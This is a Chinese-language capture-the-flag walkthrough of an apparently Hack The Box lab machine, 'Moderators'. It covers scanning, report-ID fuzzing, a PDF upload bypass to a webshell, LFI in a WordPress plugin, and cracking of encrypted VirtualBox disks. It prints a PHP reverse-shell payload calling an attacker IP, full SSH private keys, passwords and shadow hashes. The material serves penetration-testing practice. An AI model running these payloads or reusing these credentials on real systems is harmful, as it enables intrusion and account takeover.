基本信息
端口扫描 22和80:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ nmap -sC -sV -Pn 10.10.11.173 Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-29 13:20 CST Nmap scan report for 10.10.11.173 Host is up (0.19s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 390316061130a0b0c2917988d3931b3e (RSA) | 256 51945c593bbdbcb6267aef837f4cca7d (ECDSA) |_ 256 a56d03fa6cf5b94aa2a1b6bdbc604231 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Moderators Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 74.59 seconds
80 某安全公司官网之类的:
公开有几份report,可以知道参数格式:
目录扫描 扫描发现一个logs目录,直接访问是空白:
1 2 3 4 5 6 7 8 9 10 11 $ gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://10.10.11.173/ -x html,txt,php /about.php (Status: 200) [Size: 11539] /blog.php (Status: 200) [Size: 13163] /contact.php (Status: 200) [Size: 10084] /css (Status: 301) [Size: 310] [--> http://10.10.11.173/css/] /images (Status: 301) [Size: 313] [--> http://10.10.11.173/images/] /index.php (Status: 200) [Size: 11150] /logs (Status: 301) [Size: 311] [--> http://10.10.11.173/logs/] /reports.php (Status: 302) [Size: 7888] [--> index.php] /service.php (Status: 200) [Size: 9411]
logs logs目录继续扫描发现uploads:
1 2 3 gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://10.10.11.173/logs/ /uploads (Status: 301) [Size: 319] [--> http://10.10.11.173/logs/uploads/]
report FUZZ 根据上面的格式fuzz,发现一些未公开的report:
1 2 3 4 5 6 7 8 9 ffuf -w ~/Tools/dict/SecLists/Fuzzing/4-digits-0000-9999.txt -u "http://10.10.11.173/reports.php?report=FUZZ" -fs 7888 2589 [Status: 200, Size: 9786, Words: 3714, Lines: 275, Duration: 213ms] 3478 [Status: 200, Size: 9831, Words: 3740, Lines: 276, Duration: 204ms] 4221 [Status: 200, Size: 9880, Words: 3811, Lines: 274, Duration: 200ms] 4750 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5392ms] 7612 [Status: 200, Size: 9790, Words: 3704, Lines: 276, Duration: 807ms] 8121 [Status: 200, Size: 9784, Words: 3723, Lines: 274, Duration: 195ms] 9798 [Status: 200, Size: 9887, Words: 3771, Lines: 277, Duration: 194ms]
9798 9798中得到logs下路径,就是report id的md5:
1 2 $ echo -n 9798 | md5sum e21cece511f43a5cb18d4932429915ed -
2589 2589对应md5目录下继续探测发现logs.pdf(坑,没提示完全想不到):
1 2 3 4 $ echo -n 2589 | md5sum 743c41a921516b04afde48bb48e28ce6 - http://10.10.11.173/logs/743c41a921516b04afde48bb48e28ce6/logs.pdf
文件给出上传途径:
upload 文件上传绕过一些pdf相关校验成功上传pdf,路径结合前面的信息可以猜到在uploads目录下,禁用了很多函数:
webshell 蚁剑秒了:
信息 简单的枚举,发现本地8080端口,转发出来访问:
8080 1 2 3 4 5 # local ./chisel_1.7.0-rc7_darwin_amd64 server -p 8000 --reverse # target ./chisel_1.7.6_linux_amd64 client 10.10.14.19:8000 R:8080:127.0.0.1:8080 &
是一个wordpress,需要改一下hosts,因为现在是本地端口访问:
1 127.0.0.1 moderators.htb
结合服务器上信息,发现存在漏洞的插件:
wordpress exploit 不能RFI,直接本地写个php文件之后LFI即可得到lexi用户shell
1 2 3 wget http://10.10.14.19:7777/wp-load.php curl "http://localhost:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/"
lexi用户目录可以拿到私钥,方便后续操作:
wp-load.php 1 <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.19/4444 0>&1'" ); ?>
lexi_id_rsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
user flag lexi用户目录,user.txt:
信息 wp-config.php中得到数据库密码,数据库直接修改wordpress用户密码登录wp后台:
1 2 3 4 5 6 7 8 9 10 11 12 13 define( 'DB_NAME', 'wordpress' ); /** MySQL database username */ define( 'DB_USER', 'wordpressuser' ); /** MySQL database password */ define( 'DB_PASSWORD', 'wordpresspassword123!!' ); mysql -Dwordpress -uwordpressuser -p'wordpresspassword123!!' UPDATE `wp_users` SET `user_pass` = '$P$BIsDcvvyUHRF.QKXlJzhA9.kgCsuxL/' WHERE user_login = 'admin'; # 明文是password
wordpress 登录进去后,pwdms中得到john的私钥和carl账号密码:
1 2 carl@moderators.htb Carl@thebest**
john_id_rsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
John 现在可以登录john用户继续进行后续操作,发现VBOX相关文件:
vdi crack 后续操作需要virtualbox,参考wp云了(论坛也一致认为root部分很蠢,这台机器的评分也说明了这一点):
首先修改vbox文件,对应本地路径等信息
然后破解vdi密码
1 2 3 4 5 6 7 8 9 10 11 12 13 ❯ python3 pyvboxdie-cracker.py -v 2019-08-01.vbox -d wordlist.txt Starting pyvboxdie-cracker... [*] Encrypted drive found : F:/2019.vdi [*] KeyStore information... Algorithm = AES-XTS256-PLAIN64 Hash = PBKDF2-SHA256 Final Hash = 5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f [*] Starting bruteforce... 51 password tested... [*] Password Found = computer
对于接下来的内容,请记住安装 virtualbox 扩展包
一旦我们安装了 ubuntu 并添加了 vdi,我们必须启用我们之前看到的加密
当试图将它挂载到 /dev/shm 时,我们会得到一个 crypto_LUKS 类型的错误
1 2 3 ubuntu@ubuntu:~$ sudo mount /dev/sda /dev/shm mount: /dev/shm: unknown filesystem type 'crypto_LUKS' ubuntu@ubuntu:~$
我们可以用一个工具来帮助自己获取密码:
1 2 3 ubuntu@ubuntu:~$ ./bruteforce-luks-static-linux-amd64 -f wordlist.txt /dev/sda Password found: abc123 ubuntu@ubuntu:~$
安装后,我们会找到几个脚本,包括带有密码的 distro_update.sh
1 2 3 4 5 6 7 echo "" echo "Installing updates.." passwd='$_THE_best_Sysadmin_Ever_' echo $passwd|sudo apt-get update echo "Upgrading..." echo $passwd|sudo apt-get -y upgrade
changed_vbox 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 <?xml version="1.0"?> <VirtualBox xmlns ="http://www.virtualbox.org/" version ="1.16-windows" > <Machine uuid ="{528b3540-b8be-4677-b43f-7f4969137747}" name ="Moderator 1" OSType ="Ubuntu_64" snapshotFolder ="Snapshots" lastStateChange ="2022-08-11T19:20:46Z" > <MediaRegistry > <HardDisks > <HardDisk uuid ="{12b147da-5b2d-471f-9e32-a32b1517ff4b}" location ="./2019.vdi" format ="VDI" type ="Normal" > <Property name ="CRYPT/KeyId" value ="Moderator 1" /> <Property name ="CRYPT/KeyStore" value ="U0NORQABQUVTLVhUUzI1Ni1QTEFJTjY0AAAAAAAAAAAAAAAAAABQQktERjItU0hB MjU2AAAAAAAAAAAAAAAAAAAAAAAAAEAAAADssBk3IXYOVlXkLWlDd8JCJ8ZUN8FC kVQY8Ovl9vXMMyAAAABu5KwY/KgMH20LHptIADnZJ6gRrgSFLm+s6eJEaJx+ziBO AAByl/CysecMVxqIA8QKkYqCcCT+RiMz7PJCBnJ+/oGFI2DqAABAAAAAKGFz0b7a q8cFTdpSCXUCgvz+yFWcIi1i2jYow1/CS0CEEATdrtbMxzzANgoenuThAceBWSUQ FqJ4CioY8Qm3BA==" /> </HardDisk > </HardDisks > </MediaRegistry > <ExtraData > <ExtraDataItem name ="GUI/LastCloseAction" value ="PowerOff" /> <ExtraDataItem name ="GUI/LastGuestSizeHint" value ="2560,1335" /> <ExtraDataItem name ="GUI/LastNormalWindowPosition" value ="0,23,640,480,max" /> </ExtraData > <Hardware > <CPU count ="2" > <PAE enabled ="false" /> <LongMode enabled ="true" /> <X2APIC enabled ="true" /> <HardwareVirtExLargePages enabled ="true" /> </CPU > <Memory RAMSize ="2048" /> <HID Pointing ="USBTablet" /> <Boot > <Order position ="1" device ="Floppy" /> <Order position ="2" device ="HardDisk" /> <Order position ="3" device ="DVD" /> <Order position ="4" device ="None" /> </Boot > <Display controller ="VMSVGA" VRAMSize ="128" accelerate3D ="true" /> <BIOS > <IOAPIC enabled ="true" /> <SmbiosUuidLittleEndian enabled ="true" /> </BIOS > <USB > <Controllers > <Controller name ="OHCI" type ="OHCI" /> <Controller name ="EHCI" type ="EHCI" /> </Controllers > </USB > <Network > <Adapter slot ="0" enabled ="true" MACAddress ="08002799F7EC" type ="82540EM" > <NAT /> </Adapter > </Network > <AudioAdapter codec ="AD1980" driver ="DirectSound" enabled ="true" enabledIn ="false" /> <RTC localOrUTC ="UTC" /> <Clipboard /> <GuestProperties > <GuestProperty name ="/VirtualBox/GuestAdd/HostVerLastChecked" value ="6.1.34" timestamp ="1657117437893678100" flags ="" /> <GuestProperty name ="/VirtualBox/GuestAdd/Revision" value ="150636" timestamp ="1657117380950198406" flags ="" /> <GuestProperty name ="/VirtualBox/GuestAdd/Version" value ="6.1.34" timestamp ="1657117380950198404" flags ="" /> <GuestProperty name ="/VirtualBox/GuestAdd/VersionExt" value ="6.1.34" timestamp ="1657117380950198405" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/0/MAC" value ="08002799F7EC" timestamp ="1657117380952151105" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/0/Name" value ="enp0s3" timestamp ="1657117380952151107" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/0/Status" value ="Up" timestamp ="1657117380952151106" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/0/V4/Broadcast" value ="10.0.2.255" timestamp ="1657117380952151103" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/0/V4/IP" value ="10.0.2.15" timestamp ="1657117380952151102" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/0/V4/Netmask" value ="255.255.255.0" timestamp ="1657117380952151104" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/Net/Count" value ="1" timestamp ="1657117646084736900" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/OS/Product" value ="Linux" timestamp ="1657117380950198400" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/OS/Release" value ="5.15.0-40-generic" timestamp ="1657117380950198401" flags ="" /> <GuestProperty name ="/VirtualBox/GuestInfo/OS/Version" value ="#43-Ubuntu SMP Wed Jun 15 12:54:21 UTC 2022" timestamp ="1657117380950198402" flags ="" /> <GuestProperty name ="/VirtualBox/HostInfo/DekMissing" value ="1" timestamp ="1660245560293252500" flags ="RDONLYGUEST" /> <GuestProperty name ="/VirtualBox/HostInfo/GUI/LanguageID" value ="es_ES" timestamp ="1660245647071532000" flags ="" /> </GuestProperties > </Hardware > <StorageControllers > <StorageController name ="AHCI" type ="AHCI" PortCount ="3" useHostIOCache ="false" Bootable ="true" IDE0MasterEmulationPort ="0" IDE0SlaveEmulationPort ="1" IDE1MasterEmulationPort ="2" IDE1SlaveEmulationPort ="3" > <AttachedDevice type ="HardDisk" hotpluggable ="false" port ="0" device ="0" > <Image uuid ="{12b147da-5b2d-471f-9e32-a32b1517ff4b}" /> </AttachedDevice > </StorageController > </StorageControllers > <VideoCapture options ="vc_enabled=true,ac_enabled=true,ac_profile=med" fps ="25" /> </Machine > </VirtualBox >
提权 & root flag 前面得到的密码就是john密码,在 sudoers 级别具有 ALL:
1 $_THE_best_Sysadmin_Ever_
shadow 1 2 3 root:$6$aqIOGu.rJRXjVGgt$lN7qDpHZdrBxEcRi4VxcJt4dpNXwmxLsO7mTliULzPVcJyy5OPxLP3SmvgcprzkeZLbX.lPrqEg3JYYyV3Ayo0:19021:0:99999:7::: john:$6$PK0A253j816qSMhV$4Oy/1b8vR6K1XDcvBMzAVZn.MOVLiBWDHOugQorKdhVBnbi1o.fSKcSzrltl9z7hiGekw6bkt18XH14e0ALTC0:18890:0:99999:7::: lexi:$6$IXHONvrvfEmCO7dH$banmCiCTcf7rcYWQr7jn3GkYeRpfQYWxafrlhhpcpdOfqkMwBEpFXVinENnfhEa3EdiE92v30PBhp6GqF6w67/:18890:0:99999:7:::
参考资料
Last updated: 2022-11-07 09:01:03
